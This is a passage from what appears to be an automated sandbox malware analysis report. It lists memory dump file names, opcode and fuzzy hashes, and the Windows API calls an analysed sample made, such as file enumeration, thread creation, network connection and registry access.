                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: a6db715217e1f96c528aa59cd035334b4a03f76ba9324f30c828fcdbcc1cefb8
                                                                                                                                                                        • Instruction ID: 3520df9adbbd323b373b410989b7161841884cfbbf42a882757224e3c827b033
                                                                                                                                                                        • Opcode Fuzzy Hash: a6db715217e1f96c528aa59cd035334b4a03f76ba9324f30c828fcdbcc1cefb8
                                                                                                                                                                        • Instruction Fuzzy Hash: 75211B76305204AFC700DF6CDC94A29BBE5BBCD304F45456CE905CB364E6B4AA059F1A
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0042142A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: b503dc445fca873ed39c848f2cd8d2fc334865c888b7dcedd4ed15ac09cf0625
                                                                                                                                                                        • Instruction ID: 239a21a1daea632ebc0b31b079475a1fa8e58ed3985d42a87e4d3925a719045c
                                                                                                                                                                        • Opcode Fuzzy Hash: b503dc445fca873ed39c848f2cd8d2fc334865c888b7dcedd4ed15ac09cf0625
                                                                                                                                                                        • Instruction Fuzzy Hash: 98212A72612845DFDB04DFACEC88E9C77F0FF68204B004069E855CB361EA79AE16CB04
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 004250C5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: 49fdab04925f51947973e7b8627436ac063d2349d2956990db130b649acddf2b
                                                                                                                                                                        • Instruction ID: 3f433dbc34a3959e50b9b332797a7018e54b958f0fab15bb96115deec9a10e21
                                                                                                                                                                        • Opcode Fuzzy Hash: 49fdab04925f51947973e7b8627436ac063d2349d2956990db130b649acddf2b
                                                                                                                                                                        • Instruction Fuzzy Hash: EA316F7A601605EFD704CF68CD84BAAB7B0FF49308F049529E859D7220EBB1BE54CB91
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InternetOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2038078732-0
                                                                                                                                                                        • Opcode ID: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
                                                                                                                                                                        • Instruction ID: d799e9cda3f15cb694ab0866f120829321f9a12d57094e41915ee2447f8f2554
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
                                                                                                                                                                        • Instruction Fuzzy Hash: C321A131A102188FCB00EFA8DC80E9A77F5FF8C304B148128E95597322FBB0A906CF95
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0042142A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: f94e7b3d022389a3db51987f4b578fd71536007f05d70185921091cb92e205f0
                                                                                                                                                                        • Instruction ID: f95ab065ed8fd6f8000524d0835f4e5e4540767b4c463b1568e3ad28de1d330f
                                                                                                                                                                        • Opcode Fuzzy Hash: f94e7b3d022389a3db51987f4b578fd71536007f05d70185921091cb92e205f0
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F213EBA601500DFD709DBA8ED85E9977E2BB98200B048968F945D7350FAB9ED05CB44
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0003C9E3,?,00000000,00000000), ref: 00439074
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: d6bf4fa21a11a3a7220bd230ff66cf9595e9db0df3ec1bd7752baf03e3a7f0b3
• Instruction ID: e3506f95033f00cab17ad5bc1c229d55bfa8fafd69c9f2a66d76e585097e9337
• Opcode Fuzzy Hash: d6bf4fa21a11a3a7220bd230ff66cf9595e9db0df3ec1bd7752baf03e3a7f0b3
• Instruction Fuzzy Hash: B41156723042049FD308DB5DEC91E29B3E9FFD4218B19452DE955C3361EAB4AD158B1A
APIs
• FindNextFileA.KERNELBASE(?,?), ref: 00439A2D
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: FileFindNext
• String ID:
• API String ID: 2029273394-0
• Opcode ID: b438428d157cd66d71cb0828d441a37b17b3d8ee3bbcd0895725693cc8ecd222
• Instruction ID: e4def7cd09edcfc11ee4b9b853d98a94c883cedba2ebadb4e32f7ccac4a777f3
• Opcode Fuzzy Hash: b438428d157cd66d71cb0828d441a37b17b3d8ee3bbcd0895725693cc8ecd222
• Instruction Fuzzy Hash: 9F21C774E00609CFDB55CF68D991AAAB7F1BF48300F008669E959E7351E770A980CF95
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00424DDC
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: d42fe108fb75e992fce4fc041ae50da4a516ce8acce98eb3a0a451b8153a5388
• Instruction ID: 98a6f852cb3f405345897847997eb07c588c6b404fc588ce73a26b59723b40e9
• Opcode Fuzzy Hash: d42fe108fb75e992fce4fc041ae50da4a516ce8acce98eb3a0a451b8153a5388
• Instruction Fuzzy Hash: AD015EBA715111AFD704DB28DE89A6877E6EB8D2083045064E901D7364E6E2ED11CB85
APIs
• connect.WS2_32(?,?,00000010), ref: 0041B120
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: connect
• String ID:
• API String ID: 1959786783-0
• Opcode ID: 45d6ea60cf5e0b7262ad2d0a16204e3a2a8c639939ae2b066bfc23b685f8a423
• Instruction ID: a1ff9aa1605480642b7ff2df6056a6ea35e11b99697e623cf3ca73c7a8472b43
• Opcode Fuzzy Hash: 45d6ea60cf5e0b7262ad2d0a16204e3a2a8c639939ae2b066bfc23b685f8a423
• Instruction Fuzzy Hash: CE011DB52042109FC328CF29DD81D1BB7E5FF88304B14891DE4A9C7351E7B5E841CB59
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpRequestSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 360639707-0
                                                                                                                                                                        • Opcode ID: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
                                                                                                                                                                        • Instruction ID: c5f7f24f37b68b0ee58fd2f50e06334a253e74aa66ac9acfdd0b5a5957e02501
                                                                                                                                                                        • Opcode Fuzzy Hash: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
                                                                                                                                                                        • Instruction Fuzzy Hash: 2601A470A102199FE760EF68DC84F5637B8AB8C700F01467CF715E72E2EAB09841CB15
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 004021EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
